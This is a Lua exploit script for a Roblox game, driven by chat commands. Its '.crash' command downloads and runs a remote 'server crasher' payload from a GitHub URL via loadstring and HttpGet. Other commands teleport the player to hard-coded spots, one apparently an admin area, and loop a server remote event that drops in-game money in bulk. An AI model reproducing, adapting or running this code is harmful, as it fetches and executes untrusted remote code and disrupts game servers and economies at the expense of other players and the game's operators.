

local prefix = "."
_G.Player.Chatted:Connect(function(msg)
    msg = msg:lower()
    if string.sub(msg,1,3) == "/e " then
        msg = string.sub(msg,4)
    end
    if string.sub(msg,1,1) == prefix then
        local cmd
        local space = string.find(msg," ")
        if space then
            cmd = string.sub(msg,2,space-1)
        else
            cmd = string.sub(msg,2)
        end
  
if cmd == "crash" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
end

      if cmd == "setzone" then
        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(207.48085, 38.25, 200014.953, 0.507315397, 0, -0.861760437, 0, 1, 0, 0.861760437, 0, 0.507315397)
end

      if cmd == "setadmin" then
       game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-873.131531, -38.3992119, -582.999573, 0.995990932, 8.53862048e-09, -0.0894544795, 1.00775621e-09, 1, 1.06672545e-07, 0.0894544795, -1.06335037e-07, 0.995990932)
end

        if cmd == "begin" then
            _G.Cash = true; while 
_G.Cash== true do 
game.ReplicatedStorage.MainEvent:FireServer("DropMoney",10000)

game:GetService("Players").LocalPlayer.DataFolder.Currency.Value = game:GetService("Players").LocalPlayer.DataFolder.Currency.Value - 10000
wait(15) end
        end
        if cmd == "end" then
            _G.Cash = false; while 
_G.Cash== true do 
game.ReplicatedStorage.MainEvent:FireServer("DropMoney",10000)

game:GetService("Players").LocalPlayer.DataFolder.Currency.Value = game:GetService("Players").LocalPlayer.DataFolder.Currency.Value - 10000
wait(15) end
        end
        
    end
end
)
function GetPlayer(String)
    local plr
    local strl = String:lower()
        for i, v in pairs(game:GetService("Players"):GetPlayers()) do
            if v.Name:lower():sub(1, #String) == String:lower() then
                plr = v
            end 
        end
        if String == "me" then
                plr = game.Players.LocalPlayer
            end
        if String == "" or String == " " then
           plr = nil
        end
    return plr
end

